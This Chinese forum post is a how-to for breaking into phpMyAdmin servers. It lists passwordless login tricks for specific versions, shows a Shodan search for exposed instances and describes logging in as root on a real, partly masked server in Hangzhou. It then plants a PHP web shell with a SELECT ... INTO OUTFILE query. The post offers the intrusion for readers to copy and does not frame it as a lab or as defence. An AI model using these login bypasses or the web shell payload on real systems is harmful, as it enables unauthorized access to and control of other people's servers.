• 售前

  • 售后

热门帖子
入门百科

phpMyAdmin通过暗码漏洞留后门文件

[复制链接]
123457736 显示全部楼层 发表于 2021-10-26 12:52:13 |阅读模式 打印 上一主题 下一主题
      
  • 默认 phpMyAdmin:用户名 root 暗码 root 或空登陆。  
  • 版本 2.11.3~2.11.4:用户名
    1. 'localhost'@'@"
    复制代码
    登陆,无需暗码。  
  • 版本 2.11.9.2:用户名
    1. root
    复制代码
    登陆,无需暗码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在如许漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
  1. phpMyAdmin
复制代码

先看看有没有不必要暗码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

地址已手动打码。
  1. http://121.***.*.219:80/
复制代码

登陆乐成(root 权限)。

接下来你可以写一个 outfile 到对方主机的网络目次下。俗称 “留后门”。
  1. SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"
复制代码
点击运行,不出不测便在对方主机留下了一个名为
  1. runme.php
复制代码
的后门文件。
总结
以上就是这篇文章的全部内容了,渴望本文的内容对各人的学习大概工作具有肯定的参考学习价值,谢谢各人对脚本之家的支持。如果你想相识更多相干内容请查察下面相干链接

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作